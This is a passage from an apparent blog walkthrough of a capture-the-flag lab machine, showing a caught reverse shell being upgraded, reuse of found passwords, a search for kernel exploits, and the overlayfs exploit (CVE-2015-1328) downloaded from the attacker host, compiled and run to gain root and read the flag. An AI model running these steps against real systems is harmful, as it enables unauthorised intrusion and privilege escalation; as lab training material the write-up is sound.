connect to [192.168.95.3] from (UNKNOWN) [192.168.95.19] 57359

The interactive shell is not displaying correctly, so let’s make it interactive using Python.

which python
/usr/bin/python
python -c "import pty;pty.spawn('/bin/bash')"
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$

Now that we have obtained a shell, it’s time to check for the user flag. Start by changing the directory to /home .

<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /home
cd /home
www-data@ubuntu:/home$ ls -al
ls -al
total 20
drwxr-xr-x  5 root    root    4096 Apr 29  2018 .
drwxr-xr-x 22 root    root    4096 Apr 24  2018 ..
drwxr-xr-x  4 boris   boris   4096 May 24 15:51 boris
drwxr-xr-x  4 doak    doak    4096 Apr 28  2018 doak
drwxr-xr-x  4 natalya natalya 4096 Apr 28  2018 natalya
www-data@ubuntu:/home$ 

Upon listing all files and directories, I discovered three directories: boris , doak , and natalya . These seem to be the user directories on our target machine. Let’s check each one for flags.

www-data@ubuntu:/home$ cd boris
cd boris
www-data@ubuntu:/home/boris$ ls -al
ls -al
total 36
drwxr-xr-x 4 boris boris 4096 May 24 15:51 .
drwxr-xr-x 5 root  root  4096 Apr 29  2018 ..
-rw-rw-r-- 1 boris boris   63 Apr 28  2018 .bash_history
-rw-r--r-- 1 boris boris  220 Apr 23  2018 .bash_logout
-rw-r--r-- 1 boris boris 3637 Apr 23  2018 .bashrc
drwx------ 2 boris boris 4096 Apr 23  2018 .cache
-rw-r--r-- 1 boris boris  675 Apr 23  2018 .profile
-rw------- 1 boris boris  795 Apr 27  2018 .viminfo
drwx------ 3 boris boris 4096 May 24 15:51 mail
www-data@ubuntu:/home/boris$ cd /home/doak
cd /home/doak
www-data@ubuntu:/home/doak$ ls -al
ls -al
total 28
drwxr-xr-x 4 doak doak 4096 Apr 28  2018 .
drwxr-xr-x 5 root root 4096 Apr 29  2018 ..
-rw-r--r-- 1 doak doak  220 Apr 24  2018 .bash_logout
-rw-r--r-- 1 doak doak 3637 Apr 24  2018 .bashrc
drwx------ 2 doak doak 4096 Apr 28  2018 .cache
-rw-r--r-- 1 doak doak  675 Apr 24  2018 .profile
drwx------ 3 doak doak 4096 Apr 24  2018 mail
www-data@ubuntu:/home/doak$ cd /home/natalya
cd /home/natalya                                                                                                                               
www-data@ubuntu:/home/natalya$ ls -al                                                                                                          
ls -al                                                                                                                                         
total 28                                                                                                                                       
drwxr-xr-x 4 natalya natalya 4096 Apr 28  2018 .                                                                                               
drwxr-xr-x 5 root    root    4096 Apr 29  2018 ..                                                                                              
-rw-r--r-- 1 natalya natalya  220 Apr 24  2018 .bash_logout                                                                                    
-rw-r--r-- 1 natalya natalya 3637 Apr 24  2018 .bashrc                                                                                         
drwx------ 2 natalya natalya 4096 Apr 28  2018 .cache                                                                                          
-rw-r--r-- 1 natalya natalya  675 Apr 24  2018 .profile                                                                                        
drwx------ 3 natalya natalya 4096 Apr 24  2018 mail                                                                                            
www-data@ubuntu:/home/natalya$ 

Unfortunately, none of these directories contain a flag. It appears there might only be one flag on this vulnerable machine, possibly located in the root directory. 

Since we do not have user privileges to access the root directory, further escalation will be necessary to retrieve it.


Privilege Escalation

During the privilege escalation process, our main objective is to gather system information and identify any potential vulnerabilities or misconfigurations that could grant us higher privileges, ultimately allowing access to the root level.

Previously, I discovered that we do not have user access to conduct user permission enumeration to know the user’s rights and privileges on the system. However, we have found the passwords associated with the users, which we used to access the POP3 service. Let's use those passwords to check if we can switch to any of these three users.

www-data@ubuntu:/home/natalya$ su natalya                                                                                                      
su natalya                                                                                                                                     
Password: bird                                                                                                                                 
                                                                                                                                               
This account is currently not available.                                                                                                       
www-data@ubuntu:/home/natalya$ su doak                                                                                                          
su doak                                                                                                                                        
Password: goat                                                                                                                                  
                                                                                                                                               
This account is currently not available.                                                                                                       
www-data@ubuntu:/home/natalya$ su boris
su boris                                                                                                                                       
Password: secret1!                                                                                                                             
                                                                                                                                               
This account is currently not available.                                                                                                       
www-data@ubuntu:/home/natalya$

Upon trying, I found out that these three accounts are currently inactive. So, let’s check if we can still perform privilege escalation directly from here. First, let's gather system information by executing the uname -a command.

www-data@ubuntu:/home/natalya$ uname -a                                                                                                         
uname -a                                                                                                                                       
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux                                      
www-data@ubuntu:/home/natalya$

Upon execution, it prints out that the kernel version is Linux ubuntu 3.13.0-32-generic . Let's search for an exploit using searchsploit .

┌──(kali㉿kali)-[~]
└─$ searchsploit Linux ubuntu 3.13.0           
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           |  Path
----------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privileg | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege  | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)          | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                     | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation            | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                   | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege E | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation ( | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Pr | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation   | linux/local/41760.txt
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Upon execution, it provides various suitable exploits. 


Overlays Local Privilege Escalation

Let's use one of these. I think the 'overlayfs' Local Privilege exploit is suitable for our target. Before using this exploit, let’s check if there is a GCC compiler available. 

www-data@ubuntu:/home/natalya$ gcc --version                                                                                                   
gcc --version                                                                                                                                  
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'                          
www-data@ubuntu:/home/natalya$

Unfortunately, on the target machine, the GCC compiler is not available.  However, there are other compilers are there, like cc and clang . Let’s check if cc is available.

www-data@ubuntu:/home/natalya$ cc --version                                                                                                    
cc --version                                                                                                                                   
Ubuntu clang version 3.4-1ubuntu3 (tags/RELEASE_34/final) (based on LLVM 3.4)                                                                  
Target: x86_64-pc-linux-gnu                                                                                                                    
Thread model: posix                                                                                                                            
www-data@ubuntu:/home/natalya$

The cc compiler is available, so we need to modify the C program to use the cc compiler. First, we need to save the 'overlayfs' Local Privilege exploit. 

┌──(kali㉿kali)-[~]
└─$ searchsploit -m linux/local/37292.c
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
    Codes: CVE-2015-1328
 Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/kali/37292.c


                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ 

Then, open it using a text editor and modify the compiler from  gcc  to  cc  to work properly.

┌──(kali㉿kali)-[~]
└─$  nano 37292.c

Next, let's send this modified exploit to the target directory. Previously, we created an HTTP server on the default port, which is currently running. So, it is important to specify a port.

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...

Change the directory to /tmp . To download the exploit file, we will use the wget command.  

www-data@ubuntu:/home/natalya$ cd /tmp                                                                                                         
cd /tmp                                                                                                                                        
www-data@ubuntu:/tmp$ wget http://192.168.95.3:8888/37292.c                                                                                    
wget http://192.168.95.3:8888/37292.c                                                                                                          
--2024-06-27 05:37:54--  http://192.168.95.3:8888/37292.c                                                                                      
Connecting to 192.168.95.3:8888... connected.                                                                                                  
HTTP request sent, awaiting response... 200 OK                                                                                                 
Length: 4968 (4.9K) [text/x-csrc]                                                                                                              
Saving to: '37292.c'                                                                                                                           
                                                                                                                                               
100%[======================================>] 4,968       --.-K/s   in 0s                                                                      
                                                                                                                                               
2024-06-27 05:37:54 (309 MB/s) - '37292.c' saved [4968/4968]                                                                                   
                                                                                                                                               
www-data@ubuntu:/tmp$

Now, compile the program using the cc compiler.

www-data@ubuntu:/tmp$ ls -al                                                                                                                   
ls -al                                                                                                                                         
total 28                                                                                                                                       
drwxrwxrwt  4 root     root     4096 Jun 27 05:37 .                                                                                            
drwxr-xr-x 22 root     root     4096 Apr 24  2018 ..
drwxrwxrwt  2 root     root     4096 Jun 27 04:40 .ICE-unix
drwxrwxrwt  2 root     root     4096 Jun 27 04:40 .X11-unix
-rw-rw-rw-  1 www-data www-data 4968 Jun 27 00:06 37292.c
-rw-rw-rw-  1 www-data www-data 1913 Jun 26 23:47 reverse.php
www-data@ubuntu:/tmp$ cc 37292.c -o ofs
cc 37292.c -o ofs                                                                                                                              
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]                                                              
}                                                                                                                                              
^                                                                                                                                              
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]                        
        if(unshare(CLONE_NEWUSER) != 0)                                                                                                        
           ^                                                                                                                                   
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]                          
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);                                                               
                ^                                                                                                                              
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]                        
            waitpid(pid, &status, 0);                                                                                                          
            ^                                                                                                                                  
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]                            
    wait(NULL);                                                                                                                                
    ^                                                                                                                                          
5 warnings generated.                                                                                                                           
www-data@ubuntu:/tmp$ 

Upon execution, five warnings were generated, but the exploit was successfully compiled. Now, execute it and check if we have a root shell.

www-data@ubuntu:/tmp$ ls -al                                                                                                                   
ls -al                                                                                                                                         
total 44                                                                                                                                       
drwxrwxrwt  4 root     root      4096 Jun 27 05:39 .
drwxr-xr-x 22 root     root      4096 Apr 24  2018 ..
drwxrwxrwt  2 root     root      4096 Jun 27 04:40 .ICE-unix
drwxrwxrwt  2 root     root      4096 Jun 27 04:40 .X11-unix
-rw-rw-rw-  1 www-data www-data  4968 Jun 27 00:06 37292.c
-rwxrwxrwx  1 www-data www-data 13773 Jun 27 05:39 ofs
-rw-rw-rw-  1 www-data www-data  1913 Jun 26 23:47 reverse.php
www-data@ubuntu:/tmp$ ./ofs
./ofs                                                                                                                                          
spawning threads                                                                                                                               
mount #1                                                                                                                                       
mount #2                                                                                                                                       
child threads done                                                                                                                             
/etc/ld.so.preload created                                                                                                                     
creating shared library                                                                                                                        

Upon execution, we obtained a root shell, which I confirmed using the whoami command. 

# whoami                                                                                                                                       
whoami                                                                                                                                         
root                                                                                                                                           
#                                                                                                                                     

Since we have a root shell, let’s change the directory to the root and check if we can find the root flag.

# cd /root                                                                                                                                     
cd /root                                                                                                                                       
# ls -al                                                                                                                                       
ls -al                                                                                                                                         
total 44                                                                                                                                       
drwx------  3 root root 4096 Apr 29  2018 .                                                                                                    
drwxr-xr-x 22 root root 4096 Apr 24  2018 ..                                                                                                   
-rw-r--r--  1 root root   19 May  3  2018 .bash_history                                                                                        
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc                                                                                              
drwx------  2 root root 4096 Apr 28  2018 .cache                                                                                               
-rw-------  1 root root  144 Apr 29  2018 .flag.txt                                                                                             
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-------  1 root root 1024 Apr 23  2018 .rnd
-rw-------  1 root root 8296 Apr 29  2018 .viminfo
# cat .flag.txt
cat .flag.txt                                                                                                                                  
Alec told me to place the codes here:                                                                                                          
                                                                                                                                               
568628e0d993b1973adc718237da6e93                                                                                                               
                                                                                                                                               
If you captured this make sure to go here.....                                                                                                 
/006-final/xvf7-flag/                                                                                                                           
                                                                                                                                               
#     

Let's visit the URL:

If you have any doubts or queries, write me in the comment section. See you next,

Tags

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!